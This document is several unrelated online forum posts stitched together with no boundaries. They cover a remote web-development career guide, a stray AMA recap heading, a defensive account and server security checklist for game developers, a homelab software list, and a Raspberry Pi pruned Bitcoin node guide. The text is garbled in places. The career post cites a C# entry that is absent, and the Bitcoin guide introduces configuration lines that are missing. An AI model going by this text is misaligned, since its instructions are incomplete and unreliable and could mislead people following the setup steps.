It has been shared on multiple subreddits so I have no idea where to even post this. But I'd like to come up with a follow-up thread with some more information. The internet is the most powerful tool that mankind has ever invented. You have the ability to reach thousands, millions and even billions of people with just a computer and some internet access.
If you're on this subreddit, chances are you're already playing Tibia and you already have a computer and internet access. It doesn't need to be the best internet, but as long as websites will load (eventually) you are good to go.
In this topic I will go more in-depth on web development and software engineering. If you have a very slow internet connection, you may want to look into web development instead of software development. An application/software is much heavier (larger file size) than a website. And most developer jobs require that you send and download files, back and forth, between you and your company's server. So if you feel like your internet is too slow to send a lot of files - do not worry! There are plenty of jobs.
First, I will go through some more details on how to learn web development and software development. After that, I will list a few other kinds of jobs that you can do remotely. These types of jobs can be done from anywhere in the world as long as you have internet access.
Part 1: Some languages you should learn
What is web development? Well, it can be a lot of things. You perhaps make websites for shops/restaurants/hair dressers/dentists, or you work for a big company and work on their web application, like Outlook, Discord or Spotify (which can all be accessed via a browser: their web app). You can also work with design and user experience, instead of programming. Being a web developer can mean so many different things, it's impossible to name them all. But most web developers are just developers: they program. They make websites, and they either sell the websites to companies (as a consultant) or you work full/part-time for a company.
I can not provide in-depth information about every single thing, but I can give you some pointers. The very basics any web developer should know is this:
HTML (HyperText Markup Language) - it's what almost all websites use as a foundation. This is not a programming language, but it is a markup language. If you want to build websites, you pretty much have to know this language. Don't worry though, it is easy. Not so much to learn. You can learn all about it in a few weeks.
CSS (Cascading Style Sheets) - it's what will add colors and shapes to your website. If you want to focus more on design (also known as front end development) then this is where you want to gain a lot of knowledge.
Python - A very simple language to learn. This language is very often the first programming language that developers start using. You can use it for a lot of things. This language is used in the back of a lot of websites. Google has been using Python for years and still is. It's great for web scraping and making web requests. If you want a language to practice your algorithms, then this language is awesome.
PHP - This used to be a very popular language, but not so much these days. However, it is very good to know how this works because it's very simple to learn and also very functional in some cases. If you want to transmit or withdraw information from a database to your website, then this (in combination with SQL) is a great way to do so. Whenever you make a login system or a contact form, the data must be sent somehow to a recipient or a database. PHP will help you do that. It is a server-side language, which means it will run in the back of the website.
SQL - To be able to communicate with databases (for example: save data, update data, or insert data) you can use different languages for that. But SQL is probably the most widely used language for this. It is basically just a bunch of commands that you tell your website or app to do. If you have a web shop for example, you will need a database to store all your product information in. You can for example use MySQL as your database and then use the SQL language to extract data from your database and publish it as a list of products on your website.
Java - This is pretty much 90% identical to C# as I wrote above. Widely used, relatively easy to learn the basics and there's plenty of jobs. If you like making android apps, this language is for you.
Part 2: Technologies and useful tools
To become a web developer you will need a few tools. You need a text editor, a FTP client, a SSH client and some other things. Also a good browser.
Text editor: Visual Studio Code, Atom, Sublime Text, Brackets - There are many different text editors but at the moment, I highly recommend Visual Studio Code. It has so many built-in features it's honestly the only thing you may need.Don't forget to install Notepad++ as well - this very basic editor is so handy when you just quickly need to edit some files.
File archiving: WinRar, 7-Zip - You need some way of archiving projects and send it to your customer or employer. These are basic tools anyone should use. I personally use Winrar.
FTP (File Transfer Protocol): FileZilla - This tool will allow you to connect to your website's file manager and upload your files to it. There are many tools for connecting to an FTP server but this is the most popular one, it's simple and it works great.
VPS (Virtual Private Server): Amazon Web Services, Google Cloud - If you want to practice building web applications or want to host your own website as a fun project, it's great to use a VPS for that. Both Amazon and Google offers 365 days of free VPS usage. All you need is a credit card. However, they will not charge you, as long as you stay below the free tier limit. A VPS is basically a remote computer that you can connect to. I highly recommend that, if you have a slow internet connection. Those VPS-servers (by Amazon and Google) usually have 500mbit/s internet speed, which is faster than most countries in the world. You simply connect to them via Remote Desktop, or by SSH. Depending on what type of server you are using (Windows or Linux).
SSH (Secure Shell): Solar-PuTTY, PuTTY - If you for example have a web server where you store applications and files, a great way to connect to it is by using SSH. PuTTY is pretty much the standard when it comes to SSH clients. But I really love the version created by SolarWinds. When you download that one, do not enter your personal details. Their sales people will call you and haunt you! Haha.
File Searching: Agent Ransack - When you have many files and try to locate a specific document or file, you may want to use something like Agent Ransack. Much faster than the traditional search feature in Windows and it is much more accurate.
IDE / Code Editor: Visual Studio - Great tool to use when you want to create applications in C# for example. Do not confuse this with Visual Studio Code. These are two very different tools. This tool (Visual Studio) is more designed for Windows applications. Not just websites. I only recommend getting it if you plan to make programs for Windows.
Web host & domain: NameCheap, Epik, SiteGround - If you develop websites on your own, or maybe want to create a portfolio website, you will need a domain name and web hosting. I have personally used all of these 3 and they are very cheap. NameCheap has some of the cheapest domains and great web hosting for a low price. Their support is also great. Same with SiteGround. And if you want to buy a domain anonymously (with Bitcoin for example), then you can use Epik. Low prices and great customer service on all these 3 websites.
Web Browser: Mozilla Firefox, Microsoft Edge Insider, Google Chrome - You need one of the latest web browsers to create websites these days. Since I prefer privacy over functionality, I've always loved Firefox. But recently, Microsoft has been improving its new version of Edge a lot (based on Chromium) and it's also very popular. If you want all your personal details to be saved and have good tools for web development, then use Google Chrome. Don't forget to utilize the built-in developer tools. You can access it in any of these browsers by pressing F12.
Other things you may want to look into:
Web services, SSL certificates, Search Engine Optimization, Databases, API, Algorithms, Data Structures
If you want to learn in-depth about algorithms, data structures and more. Then you can take a look at the curriculum of the top-tier universities of USA. Such as: UC Berkeley, Harvard and MIT. These courses are very hard and are specifically for people who want to become experts in software engineering. You can enroll some of them for free, like the one on Harvard. And by having a such diploma (which costs $90 extra) can get you a lot of job opportunities. You can enroll those courses if you want, but it can have a fee. But just take a look at what they are studying and try do their exercises, that is 100% free. Get the knowledge. It's mostly on video too! These course below are the very same courses that many of the engineers at Facebook, Google, Amazon, Apple, Netflix, Uber, AirBnb, Twitter, LinkedIn, Microsoft, etc. has taken. It's what majority of people in Silicon Valley studied. And it's among the best classes that you can take. These course are held by some of the world's best professors in IT.
AMA Recap of CEO and Co-founder of Chromia, Henrik Hjelte in the @binancenigeria Telegram group on 03/05/2020.
The importance of being mindful of security at all times - nearly everyone is one breach away from total disaster
This is a long one - TL;DR at the end!
If you haven't heard yet: BlankMediaGames, makers of Town of Salem, have been breached which resulted in almost 8 million accounts being leaked. For most people, the first reaction is "lol so what it's just a game, why should I really care?" and that is the wrong way to look at it. I'd like to explain why everyone should always care whenever they are part of a breach. I'd also like to talk about some ways game developers - whether they work solo or on a team - can take easy steps to help protect themselves and their customers/players. First I'd like to state that there is no practical way to achieve 100% solid security to guarantee you'll never be breached or part of a breach. The goal here will be to get as close as possible, or comfortable, so that you can rest easy knowing you can deal with problems when they occur (not if, when).
Why You Should Care About Breaches
The sad reality is most people re-use the same password everywhere. Your email account, your bank account, your steam account, your reddit account, random forums and game websites - you get the idea. If you haven't pieced it together yet the implication is that if anyone gets your one password you use everywhere, it's game over for you - they now own all of your accounts (whether or not they know it yet). Keep in mind that your email account is basically the holy grail of passwords to have. Most websites handle password changes/resets through your email; thus anyone who can login to your email account can get access to pretty much any of your accounts anywhere. Game over, you lose.
But wait, why would anyone want to use my password? I'm nobody!
It doesn't matter, the bad guys sell this information to other bad guys. Bots are used to make as much use of these passwords as possible. If they can get into your bank they might try money transfers. If they get into your Amazon account they might spin up $80,000 worth of servers to mine Bitcoin (or whatever coin is popular at the time). They don't care who you are; it's all automated. By the way, according to this post (which looks believable enough to be real) this is pretty much how they got into the BMG servers initially. They checked for usernames/emails of admins on the BMG website(s) in previous breach dumps (of which there are many) and found at least one that used the same password on other sites - for their admin account! If you want to see how many of your accounts are already breached check out Have I Been Pwned - I recommend registering all of your email addresses as well so you get notified of future breaches. This is how I found out about the Town of Salem breach, myself.
How You Can Protect Yourself
Before I go into all the steps you can (and should) take to protect yourself I should note that security is in a constant tug of war with convenience. What this means is that the more security measures you apply the more inconvenienced you become for many tasks. It's up to you to decide how much is too much either way. First of all I strongly recommend registering your email(s) on https://haveibeenpwned.com/ - this is especially important if your email address is associated to important things like AWS, Steam developer account, bank accounts, social media, etc. You want to know ASAP when an account of yours is compromised so you can take steps to prevent or undo damage. Note that the bad guys have a head start on this!
You probably need to have better password hygiene. If you don't already, you need to make sure every account you have uses a different, unique, secure password. You should change these passwords at least once a year. Depending on how many accounts you have and how good your memory is, this is your first big security vs convenience trade-off battle. That's easily solved, though, by using a password manager. You can find a list of password managers on Wikipedia here or you can search around for some comparison articles. Some notable choices to consider:
1Password - recommend by Troy Hunt, creator of Have I Been Pwned
LastPass - I use this at work and it's generally good
BitWarden - free and open source! I use this at home and in some ways it's better than LastPass
KeePass (and forks) - free, open source, and totally offline; if you don't trust "the cloud" you can trade away some more convenience in exchange for taking full responsibility of your password security (and backups)
Regardless of which one you choose, any of them is 100x better than not using one at all.
The problem with all these passwords is that someone can still use them if they are found in a breach. Your passwords are only as strong as the website you use them on. In the case of the BMG breach mentioned above - all passwords were stored in an ancient format which has been insecure for years. It's likely that every single password in the breach can be reversed/cracked, or already have been. The next step you need to take is to make it harder for someone else to login with your password. This is done using Multi-Factor Authentication (or Two-Factor Authentication). Unfortunately not every website/service supports MFA/2FA, but you should still use it on every single one that does support it. You can check which sites support MFA/2FA here or dig around in account options on any particular site. You should setup MFA/2FA on your email account ASAP! If it's not supported, you need to switch to a provider that does support it. This is more important than your bank account! All of the big email providers support it: GMail, Outlook.com, Yahoo Mail, etc. The type of MFA/2FA you use depends on what is supported by each site/service, but there is a common approach that is compatible on many of them. Most of them involve phone apps because a phone is the most common and convenient "thing you have" that bad guys (or anyone, really) can't access easily. Time-based One-time Password or TOTP is probably the most commonly used method because it's easy to implement and can be used with many different apps. Google Authenticator was the first popular one, but it has some limitations which continue the security vs convenience battle - namely that getting a new phone is a super huge chore (no backup/restore option - you have to disable and setup each site all over again). Many alternatives support cloud backup which is really convenient, though obviously less secure by some measure. Notable choices to consider:
Authy - probably the first big/popular one after Google Authenticator came out (I think) - NOTE: They let you use it on your desktop/browser, too, but this is TOO much convenience! Don't fall for that trap.
LastPass Authenticator - conveniently links up with a LastPass account, some sites support extra features (like not needing to type a code, just answer a phone notification)
Yubikey - A real physical MFA device! Some models are compatible with phones, too.
Duo - this one is more geared towards enterprise, but they have a free option
Some sites/services use their own app, like Blizzard (battle.net) and Steam, and don't allow you to use other ones. You will probably have a few apps on your phone when all your accounts are setup, but it's worth it. You'll definitely want to enable it on your password manager as well if you chose a cloud-based one. Don't forget to save backup codes in an actual secure location! If you lose your backup codes and your auth app/physical key you will be locked out of accounts. It's really not fun recovering in that situation. Most recommendations are to print them and put in a fireproof safe, but using some other secure encrypted storage is fine. There is such a thing as bad MFA/2FA! However, anything is at least better than nothing. A lot of places still use SMS (text messaging) or e-mail for their MFA/2FA implementation. The e-mail one has the most obvious flaw: If someone gets into your email account they have defeated that security measure. The SMS flaws are less obvious and much less likely to affect you, but still a risk: SMS is trivial to intercept (capture data over the air (literally), clone your SIM card data, and some other methods). Still, if you're not a person of interest already, it's still better than nothing.
What Does This Have To Do With GameDev?
Yeah, I do know which subreddit I'm posting in! Here's the section that gets more into things specific to game development (or software development in general).
Secure Your Code
Securing your code actually has multiple meanings here: Securing access to your code, and ensuring your code itself is secure against exploitation. Let's start with access since that's the easier topic to cover! If you're not already using some form of Source Control Management (SCM) you really need to get on board! I'm not going to go in depth on that as it's a whole other topic to itself, but I'll assume you are using Git or Mercurial (hg) already and hosting it on one of these sites (or a similar one):
First, ensure that you have locked down who can access this code already. If you are using private repositories you need to make sure that the only people who have access are the people who need access (i.e. yourself and your team). Second, everyone should have strong passwords and MFA/2FA enabled on their accounts. If 1 person on the team does not follow good security practices it puts your whole project at risk! So make sure everyone on the team is following along. You can also look into tools to do some auditing and even automate it so that if anyone's account becomes less secure over time (say they turned off MFA one day) they would automatically lose their access. Additionally you should never commit secrets (passwords, API keys, tokens, social security numbers, etc) to your code repository. Probably 90% of cases where people have their AWS/Google Cloud/Azure accounts compromised and racking up huge bills for bitcoin mining is due to having their passwords/keys stored in their git repo. They either accidentally made it public or someone got access to the private repo through a compromised account. Never store sensitive information in your code repository! Next topic: Securing your code from vulnerabilities. This one is harder to talk about for game dev as most engines/frameworks are not as susceptible (for lack of a better word) to these situations as others. In a nutshell, you need to keep track of the following:
Is my code doing anything "dangerous"? (system-level stuff, memory access, saving passwords anywhere)
Could someone get the keys to the kingdom (API key, server password, etc) by just opening Cheat Engine and looking at memory values? Or doing a strings/hex edit/decompile/etc on my game executable?
Am I using outdated libraries/framework/engine? Do they have any known security bugs?
Secure Your Computer
I'm not going to go in depth on this one because at this point everyone should have a handle on this; if not there are limitless articles, blogs, and videos about the how/what/why. In summary: Keep everything updated, and don't open suspicious links.
Lock your computer when idle - use a password (or PIN or face unlock or whatever your OS uses) - no one should ever be able to walk up to your computer and use it if you're not looking, nor should they be able to get in if they grabbed your closed laptop off the table at starbucks (thanks u/3tt07kjt for reminding me of this one)
Use full disk encryption (especially on laptops)
Update your OS for security updates ASAP
Use anti-virus (yes, Windows Defender is fine) and keep it updated
Update your web browser ALWAYS (this is your 99% chance attack vector, so don't postpone it!)
Don't install browser extensions that you don't need - a LOT of extensions are either malware from the start or become malware later (my favorite emoji extension started mining bitcoins, FFS!) - check reviews regularly after extensions update
DO use adblock and privacy extensions - ads are a common attack vector - I recommend uBlock Origin and Privacy Badger at a minimum (note that some legit sites can break and so you'll have to fiddle with settings or whitelist)
Don't open suspicious or unknown links on e-mail, social media, discord, etc (be sure to hover over the links in this post before clicking them)
Don't open attachments, ever - unless you were expecting it from that person at that time
Don't fill out ANY forms (comments, login, registration, etc) on websites that don't have HTTPS (secure) connection - your browser will show this in the address bar, usually
In general, be suspicious of everything that comes from people you don't know - and even from people you do know if it was unexpected
E-Mail is (probably) the least secure form of communications ever invented - so try not to use it for sensitive things
Secure Your Website
I will have to add more to this later probably, but again there are tons of good articles, blogs, and videos on these topics. Hopefully the information in this section is enough to get you on the right track - if not feel free to ask for more info. Lots of guides can be found on Digital Ocean's site and they are relevant even if you don't use DO for your servers.
Use HTTPS (SSL/TLS) secure connections - it's FREE and EASY thanks to Let's Encrypt
KEEP EVERYTHING UPDATED - automate as much as you can
If you have control over the server, you MUST update the OS, the web server, and any backend application servers/languages/frameworks involved. Equifax breach was due to having out of date server software. BMG breach was worsened by having out of date server software. YOU MUST STAY UPDATED, ALWAYS
Don't store sensitive personal information - it's a huge pain to be PCI compliant, it's a huge fine if you mess it up - avoid storing any customer information that you don't actually need (see also: GDPR )
Do not allow access to SSH/Remote desktop/Database services from the whole world; the general public should only ever be able to reach ports 80 and 443 on your web server (and 80 should permanently redirect to HTTPS)
Use SSH keys instead of passwords on Linux servers
Don't run your own email server - it's just not worth it; use google apps for business, office 365, zoho, or something else for business email
Secure your domain registrar account! Don't lose your domain to a bad password or lack of MFA/2FA or an old email address! If your registrar doesn't support actual security then transfer to one that does. (namecheap, namesilo, google domains, amazon aws route53, even godaddy, the absolutely worst web company, has good security options)
A lot of this will apply to your game servers as well - really any kind of server you expect to setup.
That's it, for now
I ran out of steam while typing this all up after a couple hours, but I may revisit it later to add more info. Feel free to ask any questions about any of these topics and I'll do my best to answer them all.
TL;DR (y u words so much??)
Use a password manager so you can have different, random, secure passwords on every account on every website/service/game
Use MFA/2FA on every account, if possible
Lock your computer when idle/away
Use full disk encryption on laptops
Update your operating system (we all hate Windows Update, but it really is for our own good)
Use anti-virus (Windows Defender is fine)
Update your browser
Use good adblockeprivacy blocker browsers extensions
Don't use browser extensions that you don't really need (they could be a trojan horse of bitcoin mining later)
Don't trust anything sent by anyone, unless you were expecting it and know it's safe
E-mail is the least secure form of communications in use these days; don't trust it for sensitive things
Use source control for your game code (git, mercurial, etc)
Lock down access to your source code
Don't put secrets (passwords, API keys/tokens, social security numbers, credit card numbers) in your code repository
Don't do dumb things like store your AWS keys in your game for players to just find with simple tools
Check your code dependencies for security bugs, update them when needed
Use HTTPS on your website
Update your web server OS and software
Use secure password storage (don't reinvent this wheel, it's been solved by way smarter people)
Use SSH keys instead of passwords for Linux servers
Use a firewall to block the world from getting in with SSH/Remote desktop/database direct connections
Only allow your own IP address (which can change!) into the server for admin tasks
Don't run your own email server, let someone who knows what they are doing handle that for you
Secure your domain registrar account, keep email address up to date
... in general... in general... in general... I sure wrote those 2 words a lot.
Why Should I Trust This Post?
Hopefully I have provided enough information and good links in this post that you can trust the contents to be accurate (or mostly accurate). There is certainly enough information to do some searches on your own to find out how right or wrong I might be about these things. If you want my appeal to authority answer: I've been working at a major (network/computer) security company for almost 7 years as a software developer, and I've had to put up with pretty much every inconvenience brought on by security. I've also witnessed the aftermath of nearly every type of security failure covered in this post, via customers and the industry at large. None of the links I used are related to my employer or its products. Edit: Fixed some typos and added some more links More edit: added a few more points and links
Hey guys! I'm fairly new to this sub and to having a home lab in general and I found this community to be so kind and helping, I wanted to give back what I've learned. I'm seeing a lot of questions asked around on improvements and on what to do with x extra hardware so I thought it would be nice to have a thread to regroup that.
I'll put here some stuff I gathered and the most common questions I've seen, feel free to contribute and i'll update the post along.
oVirt -> Viurtualization
Hurrcane Electric DNS -> Dynamic DNS
No-IP -> DynamicDNS
SpiceWorks -> Misc
ERPXE -> Backup
Homelab Dashboard Posts about dashboards have been growing lately and here are some of the best that were kind enough to provide us with their sources.
Pi-hole Prevents ads from even reaching you by blocking dns queries. Works as a relay between your isp's dns server (or whichever you choose). Can also work as a local dns.
RetroPie From their website: The RetroPie Project is a collection of works that all have the overall goal to turn the Raspberry Pi into a dedicated retro-gaming console.
raspnode Tutorials for installing cryptocurrency nodes on a Raspberry Pi. Participate in the Bitcoin, Litecoin, or Ethereum network. Full nodes, SPV wallets, cold storage, offline transaction signing.
flightradar24 is a flight tracking service that provides you with real-time info about thousands of aircraft around the world.
The Plane Finder is the easiest and most accurate way to share your ADS-B and MLAT data with us.
PiAware is the world's largest flight tracking data company and provides over 10,000 aircraft operators and service companies as well as over 12,000,000 passengers with global flight tracking solutions.
CouchPotato is an wesome PVR for usenet and torrents. Just fill in what you want to see and CouchPotato will add it to your "want to watch"-list. Every day it will search through multiple NZBs & Torrents sites, looking for the best possible match. If available, it will download it using your favorite download software.
SickBeard is a PVR for newsgroup users (with limited torrent support). It watches for new episodes of your favorite shows and when they are posted it downloads them, sorts and renames them, and optionally generates metadata for them.
SickRage Automatic Video Library Manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic.
FlexGet is a multipurpose automation tool for content like torrents, nzbs, podcasts, comics, series, movies, etc.
sabnzbd makes Usenet as simple and streamlined as possible by automating everything we can.
nzbget is a binary downloader, which downloads files from Usenet based on information given in nzb-files.
headphones is an automated music downloader for NZB and Torrent, written in Python. It supports SABnzbd, NZBget, Transmission, µTorrent and Blackhole.
= Virtualization =
XenServer is an open source project and community managed by Citrix. The project develops open source software for securely running multiple operating systems and applications on a single device, enabling hardware consolidation and automation to reduce costs and simplify IT management of servers and applications.
Proxmox is a complete open source server virtualization management software. It is based on KVM virtualization and container-based virtualization and manages KVM virtual machines, Linux containers (LXC), storage, virtualized networks, and HA clusters.
VirtualBox is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use.
SmartOS is a hypervisor lean enough to run entirely in memory, powerful enough to run as much as you want to throw at it.
KVM is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V).
oVirt is free, open-source virtualization management platform. It was founded by Red Hat as a community project on which Red Hat Enterprise Virtualization is based.
= Monitoring =
Nagios is a powerful monitoring system that enables organizations to identify and resolve IT infrastructure problems before they affect critical business processes.
OMD avoids the tedious work of manually compiling and integrating Nagios addons while at the same time avoiding the problems of pre-packaged installations coming with your Linux distribution
Pandorafms is the most flexible monitoring software in the market. With a single tool, Pandora FMS can monitor everything: infrastructure, applications, services, and business progress.
PRTG Monitoring is a network monitoring software that is powerful and easy to use. Free for 100 sensors.
Zabbix is the ultimate enterprise-level software designed for real-time monitoring of millions of metrics collected from tens of thousands of servers, virtual machines and network devices.
Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems.
LibreNMS is a fully featured network monitoring system that provides a wealth of features and device support.
Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.
Munin surveys all your computers and remembers what it saw. It presents all the information in graphs through a web interface.
ZenOSS is an award winning, open source monitoring product that automatically discovers resources, without the use of agents, and provides visibility across all aspects of your IT environment whether physical, virtual or in the cloud.
AlienVault OSSIM is an open source security information and event management system. OSSIM combines Snort, OpenVAS, Nagios, OSSEC, and other tools into a single portal with log collection and correlation.
Graylog Centralize and aggregate all your log files for 100% visibility. Use our powerful query language to search through terabytes of log data to discover and analyze important information.
= Media Center =
Plex organizes your video, music, and photo collections and streams them to all of your screens.
Kodi, if a free and open source (GPL) software media center for playing videos, music, pictures, games, and more.
Emby brings all of your home videos, music, and photos together into one place.
OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more.
PlexPy is a tool to easily monitor and receive notify playback events from Plex.
MediaGoblin is a free software media publishing platform that anyone can run. You can think of it as a decentralized alternative to Flickr, YouTube, SoundCloud, etc.
= Remote access =
Guacamole is a clientless remote desktop gateway. It supports standard protocols like VNC and RDP.
Chrome Remote Desktop allows users to remotely access another computer through Chrome browser or a Chromebook.
mRemoteNG is a fork of mRemote, an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.
= VOIP =
Elastix is an Open Source Software to establish Unified Communications. About this concept, Elastix goal is to incorporate all the communication alternatives, available at an enterprise level, into a unique solution.
Asterisk is an open source framework for building communications applications. Asterisk turns an ordinary computer into a communications server.
FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX)
= Networking =
pfSense is an open-source firewall/router computer software distribution based on FreeBSD.
Open vSwitch is a production quality, multilayer virtual switch licensed under the open source Apache 2.0 license.
SophosUTM Complete Unified Threat Management protection for your network, web, email, applications, and users.
SohposXG is a fully equipped software version of the Sophos XG firewall, available at no cost for home users.
feeloadbalancer is offering the Free LoadMaster to help small companies and developers by providing them with a robust and proven load balancing option.
NetWorx is a simple and free, yet powerful tool that helps you objectively evaluate your bandwidth consumption situation.
VyOS is a community fork of Vyatta, a Linux-based network operating system that provides software-based network routing, firewall, and VPN functionality.
freeIPA is an integrated Identity and Authentication solution for Linux/UNIX networked environments.
Metiix Blockade Network-Wide Malware, Tracking, & Ad Blocking (Can also run on Raspbian)
OpenVPN is an open-source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It uses a custom security protocol that utilizes SSL/TLS for key exchange.
Smoothwall is a Free and Open Source firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface.
ClearOS is an operating system for your Server, Network, and Gateway systems. It is designed for homes, small to medium businesses, and distributed environments. ClearOS is commonly known as the Next Generation Small Business Server, while including indispensable Gateway and Networking functionality.
DriveBender is the class leading storage pooling technology for Microsoft Windows. Developed by Division-M, Drive Bender allows for file redundancy via file duplication, and unlike RAID, does not require any proprietary drive format or complicated setup. (Now free)
CloudExtender is local Windows storage, powered by the cloud... with optional, state of the art TNO (trust no one) file encryption built right in. Create a Windows drive or folder that maps directly to your favorite storage platform in minutes.
SnapRAID is a backup program for disk arrays. It stores parity information of your data and it recovers from up to six disk failures.
flexRAID is a family of storage data protection products that provide great flexibility and various innovations. The current product line includes: RAID over File System (RAID-F) Transparent RAID (tRAID).
freeNAS is an operating system that can be installed on virtually any hardware platform to share computer data storage over a computer network.
Rockstor is a free and open source NAS(Network Attached Storage) solution. It's a software solution and can be installed on any hardware or a virtual machine satisfying these minimum requirements.
nas4free The NAS4Free operating system can be installed on virtually any hardware platform to share computer data storage over a computer network.
Xpenology is the name of a Linux boot image, which allows to run operating system Sinology DSM on almost any hardware (not just Synology).
owncloud is a self-hosted file sync and share server.
openFiler provides a simple way to deploy and manage networked storage.
openATTIC openATTIC combines open source storage tools in such a way that their entire functionality can be managed through a central interface. Carefully matched components ensure both stability and security. Its open interface enables you to integrate openATTIC to provisioning, monitoring and backup systems.
= Cameras =
iSpy is the world’s most popular open source video surveillance application.
ZoneMinder is intended for use in single or multi-camera video security applications.
motioneyeOS is a Linux distribution that turns your single board computer into a video surveillance system.
Blue Iris is security camera manager. It's not free (60$ for the full version) but it was highly recommended and there doesn't seem to be any comparable free alternatives.
= Documentation =
DokuWiki is a simple to use and highly versatile Open Source wiki software that doesn't require a database.
gollum is a simple, Git-powered wiki with a sweet API and local frontend.
BookStack is a simple, self-hosted, easy-to-use platform for organising and storing information.
phpIPAM is an open-source web IP address management application (IPAM).
Paperwork aims to be an open-source, self-hosted alternative to services like Evernote ®, Microsoft OneNote ® or Google Keep ®.
afraid Free DNS Hosting, Dynamic DNS Hosting, Static DNS Hosting, subdomain and domain hosting.
No-IP's mission is to provide useful, reliable and powerful services that help home users, small and large businesses and even fortune 500 companies take control over all aspects of their DNS and domain services.
xapi-back is a simple backup tool for XenServer or XCP – xen hypervisors using xapi toolstack. xapi-back is a command line tool with simple and clear interface (command + options). Tool is written in python.
Run a 0.14 Full-Node on RaspberryPi3 Pruned(less than 16GB SD needed)
Hi! Happy if this guide helps you. Tip if you want: 19656Uwdwko5RjtnuwQENpjBwE3ChzD59v UPDATE 04/06/17 Add 'uacomment=UASF-SegWit-BIP148' into your bitcoin.conf if you want to signal UASF. UPDATE 03/13/17 ADDED a tl;dr; Version at the end of this Post. UPDATE 03/12/17: Just to test it - I reinstalled all on 8GB SD and it works as well. But maybe you should use at least 16GB for the beginning. Using a 128GB card for the first version was a little bit stupid - so I reinstalled everything on a 8GB SD card. Including Linux and a pruned blockchain - and it works. I used prune=550 and Jessie Lite (headless / command line) - without wallet and gui. The SD is almost full, but it works so far I also updated the whole manual a bit to make things more clear. Thank you for all your feedback! Just started my Bitcoin Node today and wanted to share the way I did it with people who are interested in running their own full node. It took some time to write everything down - hopefully correct so far. I am sure, many people around bitcoin are way more informed and educated as I am - I am the noob. So I wrote this manual to help users like me - noobs, to get started with a cheap, simple bitcoin node on raspberry pi. Have fun! I wanted to get my Raspberry Pi 3 working as a node to support the network. Actually the process of installing and running the node was more or less easy - but for Noobs (like I am) it might be a bit tricky to start the whole thing, because there are different ways. Did you - like me - think you would need +120GB on the raspi, external USB HDD to be a full node? You won't! If you have a Raspberry and you know what Bitcoin is, I guess, you are a little bit aware of linux, networks and of course bitcoin - so I won't go into detail too much. This guide is just a little helper to get a full node running on your raspberry pi. Thanks to the help of the nice people in this sub and of course the documentation by the developers, I got it working - and of course also special thanks to raspnode.com - as I followed their tutorial to start - I went some other ways here and there - so please read carefully. For the Part 2 I would suggest to have http://raspnode.com/diyBitcoin.html open and read through my manual. I split the tutorial in 2 Parts - PART ONE is about installing the client on your PC and downloading the Blockchain. PART TWO is about the setup of the raspberryPi and transferring the pruned blockchain to the pi and run it as a full node! The first thing to be aware of is: You actually need to download the whole blockchain to get this working - if you already have your bitcoin client synced on the PC / MAC great you can reuse it! Now you might think "but you said less than 16GB in the title!" Yes, but the good thing is you won't need to download it on your Raspberry, neither you need to sync it completely on your raspberry which took ages (weeks!) before. When you finished this Guide, you will just have a max. 4GB Blockchain on your Raspberry Pi - but it still is a full node! The magic word is Pruning. Maybe even a 8GB SD Card works just fine including Linux (jessie lite)! So, if you already have a full node on your PC - Great you can almost skip PART ONE - BUT have at how to Prune in PART ONE if you don't know about it. For PART TWO you'll need a Raspberry Pi 2 or 3 (I used 3) min. 8GB (works also) or better 16GB SD Card. (I used a 128GB for the first version of this manual - which is way too big)
This is the manual how to get started on you PC / MAC / Linux (I did it on Win7) Go to: https://bitcoin.org/en/download and download the core Client for your Machine (I used win64). Install it and configure it to save the Blockchaindata to the directory of your choice - so instead getting 120GB on your C drive, I would suggest to download it to another place like a USB drive. You can set this up during the install. Standard folder for the blockchain folder is "%APPDATA%\Bitcoin" on Windows. or you can do it after the install by creating a bitcoin.conf file inside your installation folder / or %APPDATA%\Bitcoin and add
to the file. Line by line. By the way here you could also just add dbcache - to use more memory to speed up the process a bit:
if you don't want to use the settings inside the program. (you can also set this inside the program under settings! If you have this inside the bitcoin.conf you will see the amount you set there from inside the program - it overrides the values) You can check inside the windows client under settings, if you can see a manual dbcache is set by having a look at the left footer area. When your dbcache value shows up, everything is fine. So the Blockchain download process will take time - maybe a few days! Depending on your machine, internet connection and HDD. The Blockchain is huge as it contains every single transaction of the past until today. You won't need to keep your PC running all the time, you can turn it off and on and it will resync automatically when you start bitcoin-qt.exe! Make sure to close the client always via "quit" - ctrl+q. After you have your bitcoin core installed, the blockchain downloaded and synced - you are ready to PRUNE! First - close the Client and let it close smoothly. After it is really closed you can follow these steps:
By pruning, your blockchain will dramatically shrink. From 120GB to just a few GB.
Be aware, that you will lose your Downloaded Blockchain as pruning will erase a big chunk of it! If you have enough space, you could of course keep the full blockchain saved somewhere on another HDD. You can prune by editing your bitcoin.conf file by adding:
I used prune=1024 - not sure where the differences are right now (min. prune=550). (for my 8GB version I used 550! I suggest to use this.) Save the bitcoind.conf file and restart your windows client. It will now clean up the Blockchain. So just the latest blocks are saved. The client should start without any problems. Maybe it takes some time to prune the blockchain data. Check if everything works normally (the client opens as usual, you can see an empty wallet) than close the client. Inside the Bitcoin Folder, you'll find two folders called:
those are the interesting folders containing the important data (now pruned) - and we will transfer those two to the raspberry later! Now you are good to start the raspi transfer explained in the next part.
Here is what I did: 1) I installed Raspian Pixel (https://www.raspberrypi.org/downloads/raspbian/) using a 128 GB SD - which is not needed because of "Pruning" - I think a 16GB card might work, too! (You can also install Raspian Jessie Lite - which saves you even more space, as it runs headless - only command line) (Updated: It is better to use Jessie Lite to save a lot of space - when you are fine with only command line) 2) I followed partly this tutorial to get everything running and setup:
